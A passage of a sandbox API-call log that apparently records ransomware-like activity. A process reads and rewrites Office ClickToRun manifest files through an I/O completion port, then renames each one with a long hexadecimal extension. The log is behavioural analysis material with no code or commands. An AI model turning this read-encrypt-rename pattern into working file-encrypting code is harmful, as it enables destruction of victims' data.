[0105.330] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19a) returned 0x3163160 [0105.330] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x3163160, Length=0x19a, FileInformationClass=0xa) returned 0x0 [0105.331] CloseHandle (hObject=0x31c) returned 1 [0105.337] GetProcessHeap () returned 0x600000 [0105.337] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.338] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.350] ReadFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 1 [0105.350] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.351] WriteFile (in: hFile=0x31c, lpBuffer=0x315b140*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x313b008) returned 1 [0105.352] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.352] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x28fff70) returned 0x0 [0105.353] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml", lpString2=".590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml.590BAFD8023FB2C08B6388CB451778CBFB1EFA7ECF92692804B87C1E2BD8700D" [0105.353] GetProcessHeap () returned 0x600000 [0105.353] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b4) returned 0x30f1668 [0105.353] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x30f1668, Length=0x1b4, FileInformationClass=0xa) returned 0x0 [0105.375] CloseHandle (hObject=0x31c) returned 1 [0105.390] GetProcessHeap () returned 0x600000 [0105.390] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.392] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.412] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0105.413] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml", lpString2=".6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.groovemui.msi.16.en-us.xml.6989212DCCCACF940F0432BCD84F46751CC637BB1DC297FD8EF1CB7450CEAF58" [0105.413] GetProcessHeap () returned 0x600000 [0105.413] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a0) returned 0x30f19d0 [0105.413] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x30f19d0, Length=0x1a0, FileInformationClass=0xa) returned 0x0 [0105.414] CloseHandle (hObject=0x30c) returned 1 [0105.418] GetProcessHeap () returned 0x600000 [0105.418] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.420] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.432] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x5a00, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.432] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.433] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x5a00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.434] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.434] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0105.435] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml", lpString2=".6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.lyncmui.msi.16.en-us.xml.6C9C72A264DFE42351FF8BD45DC69B215DC711029D3433452F6C233C2943086B" [0105.435] GetProcessHeap () returned 0x600000 [0105.435] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6dc908 [0105.435] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x6dc908, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0105.437] CloseHandle (hObject=0x30c) returned 1 [0105.442] GetProcessHeap () returned 0x600000 [0105.442] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.444] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.450] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x5400, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.450] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.451] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x5400, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0105.452] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.453] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0105.453] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml", lpString2=".4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64mui.msi.16.en-us.xml.4812F047BE1161911FAB8137A4DF6A32BF0AC27EC6FB41974189F0E250F0FD25" [0105.453] GetProcessHeap () returned 0x600000 [0105.453] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a4) returned 0x6dcab0 [0105.453] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x6dcab0, Length=0x1a4, FileInformationClass=0xa) returned 0x0 [0105.455] CloseHandle (hObject=0x30c) returned 1 [0105.458] GetProcessHeap () returned 0x600000 [0105.458] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.459] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.466] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x600, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.466] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.467] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 0x0 [0105.467] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.468] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0105.468] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml", lpString2=".6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64muiset.msi.16.en-us.xml.6476B1F5C9EC68FA29EC3041285CF19575A68249FA9581078AF2DFB6826AC864" [0105.468] GetProcessHeap () returned 0x600000 [0105.468] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1aa) returned 0x6dcc60 [0105.468] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x6dcc60, Length=0x1aa, FileInformationClass=0xa) returned 0x0 [0105.469] CloseHandle (hObject=0x30c) returned 1 [0105.474] GetProcessHeap () returned 0x600000 [0105.474] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.475] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.481] ReadFile (in: hFile=0x30c, lpBuffer=0x6d48e8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.481] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.482] WriteFile (in: hFile=0x30c, lpBuffer=0x6d48e8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0 | out: lpBuffer=0x6d48e8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x6b47b0) returned 1 [0105.482] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.483] NtQueryObject (in: Handle=0x30c, ObjectInformationClass=0x1, ObjectInformation=0x6b4860, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6b4860, ReturnLength=0x28fff70) returned 0x0 [0105.484] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml", lpString2=".0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.office64ww.msi.16.x-none.xml.0D912E9F3B4B905333FA9C7A2B2595BD4015D2531E6002305BAE24A17276280E" [0105.484] GetProcessHeap () returned 0x600000 [0105.484] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1a4) returned 0x6dce18 [0105.484] NtSetInformationFile (FileHandle=0x30c, IoStatusBlock=0x28fff60, FileInformation=0x6dce18, Length=0x1a4, FileInformationClass=0xa) returned 0x0 [0105.485] CloseHandle (hObject=0x30c) returned 1 [0105.498] GetProcessHeap () returned 0x600000 [0105.498] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6b47b0 | out: hHeap=0x600000) returned 1 [0105.500] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.649] ReadFile (in: hFile=0x31c, lpBuffer=0x315b140, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008 | out: lpBuffer=0x315b140, lpNumberOfBytesRead=0x0, lpOverlapped=0x313b008) returned 0x0 [0105.653] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.654] NtQueryObject (in: Handle=0x31c, ObjectInformationClass=0x1, ObjectInformation=0x313b0b8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x313b0b8, ReturnLength=0x28fff70) returned 0x0 [0105.655] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml", lpString2=".CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.OneNote.OneNote.x-none.msi.16.x-none.xml.CA57FC1D02A891435E52E4B359361A0D9E02A777B7D8828F53EE9E6472155947" [0105.655] GetProcessHeap () returned 0x600000 [0105.655] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1bc) returned 0x30f1b78 [0105.655] NtSetInformationFile (FileHandle=0x31c, IoStatusBlock=0x28fff60, FileInformation=0x30f1b78, Length=0x1bc, FileInformationClass=0xa) returned 0x0 [0105.657] CloseHandle (hObject=0x31c) returned 1 [0105.661] GetProcessHeap () returned 0x600000 [0105.661] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0105.663] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.851] ReadFile (in: hFile=0x32c, lpBuffer=0x3184b90, nNumberOfBytesToRead=0x6200, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3164a58) returned 1 [0105.851] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.854] WriteFile (in: hFile=0x32c, lpBuffer=0x3184b90, nNumberOfBytesToWrite=0x6200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58 | out: lpBuffer=0x3184b90, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3164a58) returned 0x0 [0105.854] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.855] WriteFile (in: hFile=0x31c, lpBuffer=0x30c0180*, nNumberOfBytesToWrite=0x5e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 1 [0105.856] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.957] ReadFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30a0048) returned 1 [0105.957] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.958] WriteFile (in: hFile=0x308, lpBuffer=0x30c0180, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048 | out: lpBuffer=0x30c0180, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30a0048) returned 0x0 [0105.958] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.959] NtQueryObject (in: Handle=0x308, ObjectInformationClass=0x1, ObjectInformation=0x30a00f8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30a00f8, ReturnLength=0x28fff70) returned 0x0 [0105.960] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2=".4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.4F944E8E1926BB94C9856018047341D9F95E4EDDE0201794E12796A3B149AD72" [0105.960] GetProcessHeap () returned 0x600000 [0105.960] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b8) returned 0x30f14a0 [0105.960] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x28fff60, FileInformation=0x30f14a0, Length=0x1b8, FileInformationClass=0xa) returned 0x0 [0105.961] CloseHandle (hObject=0x308) returned 1 [0105.990] GetProcessHeap () returned 0x600000 [0105.991] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30a0048 | out: hHeap=0x600000) returned 1 [0105.992] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.993] ReadFile (in: hFile=0x314, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0105.994] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0105.994] WriteFile (in: hFile=0x314, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0105.995] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0106.027] NtQueryObject (in: Handle=0x314, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0106.027] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2=".3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735" | out: lpString1="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735") returned="\\Device\\HarddiskVolume1\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.3934B8B27D27D3FCDB3151AC44D67DB926A7B6FBE41BE8629AB21C9ECFE2A735" [0106.027] GetProcessHeap () returned 0x600000 [0106.027] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x1b0) returned 0x3163a50 [0106.027] NtSetInformationFile (FileHandle=0x314, IoStatusBlock=0x28fff60, FileInformation=0x3163a50, Length=0x1b0, FileInformationClass=0xa) returned 0x0 [0106.029] CloseHandle (hObject=0x314) returned 1 [0106.034] GetProcessHeap () returned 0x600000 [0106.034] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0106.035] 